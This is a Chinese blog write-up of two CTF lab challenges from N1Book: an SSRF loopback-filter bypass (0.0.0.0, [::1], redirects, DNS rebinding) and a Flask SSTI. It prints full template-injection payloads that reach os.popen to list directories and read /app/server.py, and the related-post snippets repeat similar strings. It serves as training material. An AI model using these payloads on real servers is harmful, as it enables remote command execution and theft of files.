第三章 web进阶n1book

最新推荐文章于 2024-04-02 01:49:02 发布
最新推荐文章于 2024-04-02 01:49:02 发布
阅读量702 收藏 4
点赞数 1
分类专栏: web做题记录
原文链接:https://blog.csdn.net/weixin_46703850/article/details/114038674
版权

[第三章 web进阶]Python里的SSRF

在这里插入图片描述
直接按照提示来:
在这里插入图片描述
127.0.0.1是被禁止的
用0.0.0.0代替127.0.0.1就是成功了,
127.0.0.1是本机的环回地址,0.0.0.0代表本机上任何IP地址,因此可以利用0.0.0.0来绕过127.0.0.1的过滤。
在这里插入图片描述

本题有多重解法

 - `0.0.0.0:8000` 绕过
 - `[::1]:8000` 绕过(需要支持 ipv6)
 - 重定向跳转到 `127.0.0.1:8000`
 - dns rebinding 输入一个域名,第一次解析到非 `127.0.0.1` 地址上,第二个解析到 `127.0.0.1` 上。

[第三章 web进阶]SSTI

在这里插入图片描述
尝试输入?password={{7*7}}
在这里插入图片描述
可以确定就是flask模板注入

通过以下语句拿到可用的类的列表

../?password={{"".__class__.__bases__[0].__subclasses__()}}

在这里插入图片描述

我们要判断他所属的位置,这样才能进行索引,但干用眼睛看肯定太麻烦,我这有个小技巧,将全部类复制放到pycharm(与他有同样功能的工具也行),我们索引逗号的位置,我们索引到我们需要类的位置,再在索引他前面逗号的位置,我这里索引的结果是127,如果不对上下浮动几位看一下,大概就这个位置,我这127是正确的,
在这里插入图片描述

我们可以先看一下我们索引的是否正确,输入url

../?password={{"".__class__.__bases__[0].__subclasses__()[127]}}

在这里插入图片描述
我这里索引的结果是127,如果不对上下浮动几位看一下,大概就这个位置,我这127是正确的,所以索引结果就是<class ‘os._wrap_close’>

构造语句,并执行ls命令(对方是Linux服务器,所以要使用Linux命令)

../?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}

在这里插入图片描述
整理一下就是有以下几个文件夹

├── app  
├── bin 
├── boot 
......
└── var

其中最引起我们注意的就是app这个文件夹

经过一些尝试(目录遍历什么的),我们得知flag就在/app/server.py中,我们直接用cat查看文件内容就行

../?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat /app/server.py').read()}}

在这里插入图片描述

_pain_
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
第三章单片机程序设计优秀文档.ppt
12-03
第三章 单片机程序设计】\n\n在单片机编程中,主要涉及到两种基本的程序设计语言,即汇编语言和高级语言(如C语言)。汇编语言因其直接对应机器指令,执行效率高,能充分利用硬件资源,但编写起来较为复杂。相反,...
《从0到1:CTFer成长之路》书籍配套题目-[第三章 web进阶]Encrypted Flask
weixin_46703850的博客
03-28 967
[第三章 web进阶]Encrypted FlaskStep One
《Flask Web开发实战:入门、进阶与原理解析》笔记代码学习和注释(第三章-模板)
numb_ac的博客
10-18 390
一、模板的形成 模板的设计,可以看做是一个一层一层装饰的过程 模板(template),对应的是MTV结构里面的T,在flask里面主要用来进行对HTML的渲染,然后显示到用户面前。所以其基础是HTML 模板里面除了HTML语法之外,还包含了控制语句和很多有用的函数,以及一些有用的规则。 还可以通过自定义全局函数、全局变量、过滤器、测试器等函数来丰富模板的功能。 二、模板的组织 局部模板:可以让模板之间进行继承,实现重复子模板的重用 宏:同样地,子代码也能重用,其实它就相当于是模板里的“函数”,注意
ssti
2h4ox1n9
05-23 921
[第三章 web进阶]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
攻防世界web解题[进阶](五)
weixin_46703850的博客
03-10 462
攻防世界web解题[进阶](五) 介绍:记录解题过程 15.Web_python_template_injection(python 模板注入) 16.Web_php_unserialize( php 反序列) 17.easytornado 18.shrine(flask模板注入)
[第三章 web进阶]Python里的SSRF
qq_27743059的博客
07-12 423
发现没有有效界面信息,这个时候查看靶机说明信息,在说明信息里面明确提到访问容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag。还是不行,休息一下后,想到127.0.0.1=0.0.0.0=127.127.127.127,就尝试使用。由于提示信息中提到url path,则可以尝试设置参数名为url。发现127.0.0.1被禁止访问,则可以尝试各种变形。
python3 flask web前端加密
baidu_36831253的博客
03-25 1343
目录结构 app/ |---test.py |---loginrsa.py |---static/ |-----js/ |----jquery.js (官方下载的) |----jsencrypt.min.js 网上下载的 |---templates/ |----...
第三章-制作第一个Flash动画2022优秀文档.ppt
11-14
本章主要介绍了如何制作第一个Flash动画,让我们深入探讨一下。\n\n**动画制作的基本流程**\n\n1. **构思动画**:在开始制作前,首先需要清晰地定义动画的主题和创意,明确动画想要传达的信息,并考虑观众的接受度。...
汽车电子技术与单片机第11章.ppt
11-12
【汽车电子技术与单片机第11章】主要探讨的是汽车电子系统中的一种通信协议——LIN(Local Interconnect Network)总线,以及在该总线中应用的TJA1020收发器芯片的技术特性。LIN总线是一种低成本、低速(最高20kbps...
电工学题解:第四章 变压器修改.doc
11-29
变压器的功能可由三个变换来表述: 1. 电压变换──主要用途是电源升降压。原绕组电压与副绕组电压的比值近似为原绕组匝数与副绕组匝数的比值称为变比,即:$k = \frac{N_1}{N_2} = \frac{U_1}{U_2}$ 2. 电流变换─...
VFP第4章程序设计基础(2).ppt
11-18
在第四章“程序设计基础”中,主要讲解了如何在VFP中进行程序设计,包括数据的输入、处理及输出,以及程序的基本结构和流程。\n\n1. **数据库中的永久性关联**:在VFP中,数据库中的表可以通过共同的字段建立永久性...
Buuctf——[第三章 web进阶]Python里的SSRF
m_de_g的博客
08-18 1644
[第三章 web进阶]Python里的SSRF 打开题目,题目让我们传入url,测试SSRF漏洞 http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://www.baidu.com 发现可以访问百度,根据题目提示说 我们就访问容器内部的8000端口 http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://127.0.0
Web前端进阶
weixin_45784511的博客
03-16 307
字体图标-iconfont,平面转换,渐变,空间转换(3D转换),动画,移动端特点,百分比布局,Flex布局,移动适配,Less,响应式,BootStrap
[第三章 web 进阶] SSTI——WP
最新发布
weixin_54227009的博客
04-02 268
注:基类的子列表[127]为os(这台靶场上的python环境是127,每个python版本不一样,好比python3.9貌似没os了)4、测试是否存在模板注入url?password={{2*2}}2、进入网页发现password is wrong。3、猜测password为参数。查看当前目录下有那些文件。1、题目提示为SSTI。
【BUUCTF N1BOOK】[第三章 web进阶] 通关
人若无名,便可专心练剑
02-09 1223
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
buuctf [第三章 web进阶]Python里的SSRF
qq_52671379的博客
04-21 2990
buuctf [第三章 web进阶]Python里的SSRF
从0到1——CTFer成长之路(四)
youngerll的博客
03-09 651
从0到1——CTFer成长之路(四)反序列化漏洞thinkphp反序列化利用链python的安全问题python里的SSRFSSTI密码学及逆向知识Encrypted Flaskunsecure converter逻辑漏洞逻辑漏洞 第三章 web进阶 反序列化漏洞 thinkphp反序列化利用链 python的安全问题 python里的SSRF SSTI 密码学及逆向知识 Encrypted Flask unsecure converter 逻辑漏洞 逻辑漏洞 ...
buuctf [第三章 web进阶]Python里的SSRF 1
LztCode
03-29 4010
我看很多wp都没有提到这个绕过方式,分享一下 1、直接访问node4.buuoj.cn:81/?url=http://127.0.0.1:8000/api/internal/secret 2、使用0代替127.0.0.1绕过,访问node4.buuoj.cn:81/?url=http://0:8000/api/internal/secret 3、得到flag ...
服务器模板注入 (SSTI)
since_2020的博客
09-08 283
服务器模板注入 (SSTI) 基本注入流程 ''.__class__ 显示这个东西的类 ''.__class__.base__ 找到这个的基类 ''.__class__.__base__.__subclasses__() 看基类的子类 敏感子类 popen、sys、os 因为''.__class__.__base__.__subclasses__()返回的是一个列表, 所以直接''.__class__.__base__.__subclasses__()[425]查看的就是popen这个 注意
buuctf n1book
08-23
- *1* *2* *3* [BUUCTF笔记之N1BOOK](https://blog.csdn.net/shuaicenglou3032/article/details/117934550)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值